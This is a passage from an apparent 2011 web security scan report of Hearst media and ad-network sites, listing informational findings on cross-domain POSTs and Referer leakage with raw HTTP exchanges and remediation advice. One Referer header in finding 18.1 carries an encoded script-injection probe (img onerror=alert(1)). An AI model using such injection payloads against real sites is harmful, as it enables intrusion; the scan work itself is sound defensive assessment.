class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">336</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"182a19eb",fb_dtsg:"AQDoYYJd",no_cookies:1,lhsh:"FAQB-8_XT"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","mobile":false,"nodeType":"page","externalURL":"http:\/\/www.localedge.com\/","pageId":null,"widgetID":"connect_widget_4e74ca42303d73153797759","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","commentWidgetMarkup":"","error":null,"autoResize":true,"connectText":0
...[SNIP]...
16.13. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=181790778546301&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a42cadd4%26origin%3Dhttp%253A%252F%252Fwww.thedailygreen.com%252Ff29d10b224%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=257&href=http%3A%2F%2Fwww.facebook.com%2Fthedailygreen&locale=en_US&sdk=joey&show_faces=true&stream=false&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.227.37
X-Cnection: close
Date: Sat, 17 Sep 2011 16:28:06 GMT
Content-Length: 12531

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e74ca962b6636821970928" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text"></span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></d
...[SNIP]...

Request 2

GET /plugins/likebox.php?api_key=181790778546301&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a42cadd4%26origin%3Dhttp%253A%252F%252Fwww.thedailygreen.com%252Ff29d10b224%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=257&href=http%3A%2F%2Fwww.facebook.com%2Fthedailygreen&locale=en_US&sdk=joey&show_faces=true&stream=false&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.234.39
X-Cnection: close
Date: Sat, 17 Sep 2011 16:28:13 GMT
Content-Length: 12501

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e74ca9dedde27563296261" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text"></span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></d
...[SNIP]...
16.14. http://www.kaboodle.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /

Request 1

GET / HTTP/1.1
Host: www.kaboodle.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tA%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B%00x1642526051; Expires=Mon, 16-Sep-2013 16:30:31 GMT; Path=/
Set-Cookie: rc=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rc=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:30:30 GMT
Content-Length: 85304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getTime()])</script>
   <title>Kaboodle Home</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   <meta http-equiv="Content-Language" content="en-US" />
   <meta property="og:site_name" content="Kaboodle"/>
   <meta name="google-site-verification" content="rhRG0kRQCvqDVV9rYctPcPsZ5BfuKpiJAutXTEogVts" />
   <meta name="msvalidate.01" content="B3C9690FE2D68A6B3165543D77A5B3D1" />    
   <link rel="stylesheet" href="http://cn1.kaboodle.com/ht/k4/style/global.css?v=r54745-2" type="text/css" media="screen" /><!--[if IE 7]><link rel="stylesheet" href="http://cn1.kaboodle.com/ht/k4/style/ie7.css?v=r54745-2" type="text/css" media="screen" /><![endif]--><!--[if IE 8]><link rel="stylesheet" href="http://cn1.kaboodle.com/ht/k4/style/ie8.css?v=r54745-2" type="text/css" media="screen" /><![endif]--><!--[if IE 9]><link rel="stylesheet" href="http://cn1.kaboodle.com/ht/k4/style/ie9.css?v=r54745-2" typ
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.kaboodle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tA%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B%00x1642646205; Expires=Mon, 16-Sep-2013 16:30:35 GMT; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:30:35 GMT
Content-Length: 85304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getTime()])</script>
   <title>Kaboodle Home</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   <meta http-equiv="Content-Language" content="en-US" />
   <meta property="og:site_name" content="Kaboodle"/>
   <meta name="google-site-verification" content="rhRG0kRQCvqDVV9rYctPcPsZ5BfuKpiJAutXTEogVts" />
   <meta name="msvalidate.01" content="B3C9690FE2D68A6B3165543D77A5B3D1" />    
   <link rel="stylesheet" href="http://cn1.kaboodle.com/ht/k4/style/global.css?v=r54745-2" type="text/css" media="screen" /><!--[if IE 7]><link rel="stylesheet" href="http://cn1.kaboodle.com/ht/k4/style/ie7.css?v=r54745-2" type="text/css" media="screen" /><![endif]--><!--[if IE 8]><link rel="stylesheet" href="http://cn1.kaboodle.com/ht/k4/style/ie8.css?v=r54745-2" type="text/css" media="screen" /><![endif]--><!--[if IE 9]><link rel="stylesheet" href="http://cn1.kaboodle.com/ht/k4/style/ie9.css?v=r54745-2" type="text/css" media="screen" /><![endif]--><link rel="stylesheet" href="http://cn1.kaboodle.com/ht/k4/style/homepage.css?v=r54745-2" type="text/css" media="screen" />
   
...[SNIP]...
17. Cross-domain POST  previous  next
There are 4 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

17.1. http://www.delish.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delish.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain app.hearstmags.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.delish.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countrycode=us; neworold=8; sample=10; s_nr=1316282680825; __unam=753a475-13278828e41-121285cc-5; countrycode=us; __utma=120665501.1463594788.1316281819.1316285519.1316287865.3; __utmz=120665501.1316287865.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; s_lastvisit=1316287865298; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=193
Date: Sat, 17 Sep 2011 16:27:44 GMT
Content-Length: 87023
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
</div>
           <form method="POST" action="http://app.hearstmags.com/enroll/dynamic/signup.cfm" onSubmit="return validateForm(this);">
               <input type="hidden" name="form_id" value="41">
...[SNIP]...
17.2. http://www.quickandsimple.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quickandsimple.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain app.hearstmags.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.quickandsimple.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=65
Date: Sat, 17 Sep 2011 16:33:28 GMT
Content-Length: 48433
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
</div>
                   <form method="POST" action="http://app.hearstmags.com/enroll/dynamic/signup.cfm">
                       <input type="hidden" name="form_id" value="37" />
...[SNIP]...
17.3. http://www.seventeen.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain app.hearstmags.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.seventeen.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=68
Date: Sat, 17 Sep 2011 16:34:01 GMT
Content-Length: 103172
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns
...[SNIP]...
</div>
<form name="rrsocialNewsltr" method="POST" action="http://app.hearstmags.com/enroll/dynamic/signup.cfm" onsubmit="return vtemail.validateForm(this);">
<input type="hidden" name="form_id" value="42">
...[SNIP]...
17.4. http://www.thedailygreen.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailygreen.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain app.hearstmags.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.thedailygreen.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=423
Date: Sat, 17 Sep 2011 16:26:50 GMT
Content-Length: 98795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
</div>
           <form action="http://app.hearstmags.com/enroll/thedailygreen/signup.cfm" method="POST">
               <input type="hidden" value="74" name="form_id">
...[SNIP]...
18. Cross-domain Referer leakage  previous  next
There are 177 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

18.1. http://a.netmng.com/hic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=140&nm_c=200&beacon=2010june&url=[URL_ENCODED_REFERER]&passback HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: u=5f8e79cc-32a7-4701-a3f9-9a6f407e1e04; cdb0=3.113127277138.2266; cdbp=0,19,0; cdb1=; cdb2=; cdb3=; evo5=y9dly9jlztlwn%7Cjt7hNTHSSalmkggJVXyhSde8uI0RYi0avPF9AY0XnbifcaFEMqtkWSNsqllaE9MQ5Qvh0ZHmhqMXkAoIXTUGZU9nxLLIhNudmIQN5of6vB4vDh9TPU%2BkidUnQnV8lGXbiXqzET%2B0owFsOY7lmNgxGEOtTQL1bpTEu6BKOYjD3vTaje3s7aq%2FXcF3VvAicm1lQLkj%2F4xYqajg6Hkhv3ajvfa0hDJicTSwWGgqJ3fkbNkq9P4Mn239%2FQZw1Oa1JeikVeYM4LDw69dHPcDMp640B018JRk419t7Ybt5PBcN%2B25GW5unwqzZ2QVrp2Do7sfbM50SDnIEvNKt%2BPwZ2q03xWEMWAygZ%2FHwhgko6UaL4l%2BDTKIK8G1sxYFjM8jeCaYRUCGPp56861XA%2FW%2FAabxKZO%2BDbQf4VcwQUPcIlH%2B70bVPJbw0lZSaD6n%2BtWQUI%2FiCfdnf2z2Mx6yFnIeqaD2HT7ziMAgr0%2BG9nfxa8YdgSVk9uYu8ZOaM6tn81eFLhaNX

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:04:23 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 15 Sep 2011 17:04:23 GMT
Last-Modified: Thu, 15 Sep 2011 17:04:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_display=%2BVh8H0s8fTT%2FyJTublM%2BiWVvC2%2BXgxUbUPO2JPfLmxQPJcLjX5qzTkpiNBBPst0wI%2BlXbtBUthwow7WNwjS2LQ%3D%3D; expires=Mon, 22-Aug-44591 17:04:23 GMT; path=/; domain=.netmng.com
Content-Length: 768
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Net_Mining_Evolution/B3846296.4;sz=728x90;ord=1316279063?"WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000"><SCRIPT language="JavaScript1.1"SRC="http://ad.doubleclick.net/adj/N1558.Net_Mining_Evolution/B3846296.4;sz=728x90;ord=1316279063?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N1558.Net_Mining_Evolution/B3846296.4;sz=728x90;ord=1316279063?"><IMG SRC="http://ad.doubleclick.net/ad/N1558.Net_Mining_Evolution/B3846296.4;sz=728x90;ord=1316279063?"BORDER=0 WIDTH=728 HEIGHT=90 ALT="Click Here"></A></NOSCRIPT></IFRAME><img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1443&token=NETM8" width="1" height="1" border="0"/>
18.2. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j.ad?site=uproxxcom&adSpace=httpwwwuproxxcom&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fwww.uproxx.com%2F&f=0&p=18961419&a=2&rnd=18983233 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 17:36:08 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 193
Expires: 0
Connection: keep-alive

document.write('<iframe src="http://widgets.uproxx.com/ads/tribal/ur-tech-300.html" width=300 height=250 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>');
18.3. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j.ad?site=seattlepicom&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fwww.seattlepi.com%2F&rurl=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php&f=0&p=14624935&a=1&rnd=14633219 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 16:23:45 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 489
Expires: 0
Connection: keep-alive

document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]?" type="text/javascript"><\/script>\r\n<noscript><a hre
...[SNIP]...
18.4. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j.ad?site=uproxxcom&adSpace=httpwwwuproxxcom&tagKey=117090495&th=37103964303&tKey=undefined&size=728x90&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fwww.uproxx.com%2F&f=0&p=18961419&a=1&rnd=18965560 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 17:35:49 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 192
Expires: 0
Connection: keep-alive

document.write('<iframe src="http://widgets.uproxx.com/ads/tribal/ur-tech-728.html" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>');
18.5. http://a1.interclick.com/CookieCheck.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /CookieCheck.aspx

Issue detail

